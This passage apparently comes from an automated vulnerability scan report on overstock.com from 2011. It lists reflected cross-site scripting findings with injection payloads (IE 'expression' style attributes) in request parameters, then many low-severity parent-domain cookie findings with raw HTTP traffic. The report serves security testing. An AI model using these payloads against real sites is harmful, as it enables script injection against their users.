The value of the TID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddcf9"style%3d"x%3aexpression(alert(1))"db8207d1b71 was submitted in the TID parameter. This input was echoed as ddcf9"style="x:expression(alert(1))"db8207d1b71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html?TID=R:A2_5ddcf9"style%3d"x%3aexpression(alert(1))"db8207d1b71 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:39:48 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:39:48 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=2552133|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:39:48 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:39:48 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 136793

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="tid" value="R:A2_5ddcf9"style="x:expression(alert(1))"db8207d1b71"/>
...[SNIP]...

1.23. http://www.overstock.com/Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dd0a"style%3d"x%3aexpression(alert(1))"ba8213cf9e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9dd0a"style="x:expression(alert(1))"ba8213cf9e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html?9dd0a"style%3d"x%3aexpression(alert(1))"ba8213cf9e6=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:39:00 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:39:00 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:39:00 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=2552133|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:39:00 GMT; Path=/
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 136777

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="9dd0a"style="x:expression(alert(1))"ba8213cf9e6" value="1"/>
...[SNIP]...

2. Cookie scoped to parent domain  previous  next
There are 21 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


2.1. http://www.overstock.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.overstock.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; mxclastvisit=20110203

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:15:12 GMT
Server: Apache
Set-Cookie: SSLB=A; path=/; domain=www.overstock.com
Set-Cookie: SSID=AwAXDSkAAAAAELJWTQxpBgUQslZNAQAQslZNAAAAAAAAAAAQslZNAQDsAAAAhg4AAAI; path=/; domain=www.overstock.com; expires=Sun, 12-Feb-2012 16:15:12 GMT
Set-Cookie: SSSC=2.G5572837370791094540.1.236.3718; path=/; domain=www.overstock.com
Set-Cookie: SSRT=ELJWTQE; path=/; domain=www.overstock.com; expires=Sun, 12-Feb-2012 16:15:12 GMT
Vary: Cookie,Accept-Encoding,User-Agent
Expires: Thu, 20 May 2010 20:51:00 GMT
Pragma: no-cache
Encoding: iso-8859-1
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: se_list=se_list^0|4|; Domain=.overstock.com; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527312838|csbshow^0|mxcshopmore^http://www.overstock.com/; Domain=.overstock.com; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1297527312839; Domain=.overstock.com; Path=/
Set-Cookie: clubogiftcards=clubogctotal^0.00; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:15:12 GMT; Path=/
Sitespect: true
Content-Length: 89639


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- end SITE-DOCYTPE -->
<html>
   <head>
<!-- // --><script language='javascript' type='text/ja
...[SNIP]...

2.2. http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html?IID=prod5072802&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:32:12 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:32:12 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5072802|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:12 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:12 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 133008

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

2.3. http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html?IID=prod5213639&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:32:07 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:32:07 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5213639|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:07 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:07 GMT; Path=/
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 128413

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

2.4. http://www.overstock.com/Home-Garden/1/store.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/1/store.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/1/store.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:42 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:43 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/1/store.html|searchhistory^categories; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:43 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 272482

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

2.5. http://www.overstock.com/Home-Garden/Bedding-Bath/1/dept.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Bedding-Bath/1/dept.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Bedding-Bath/1/dept.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:44 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:44 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:44 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Bedding-Bath/1/dept.html|searchhistory^categories; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 285996

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

2.6. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html?IID=prod4068266&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:47 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:47 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4068266|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:47 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:47 GMT; Path=/
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 129619

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

2.7. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html?IID=prod5203264&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:31:32 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:31:32 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5203264|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:31:32 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:31:32 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=51
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 120311

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

2.8. http://www.overstock.com/Home-Garden/Chairs/2737/subcat.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Chairs/2737/subcat.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Chairs/2737/subcat.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:45 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:45 GMT
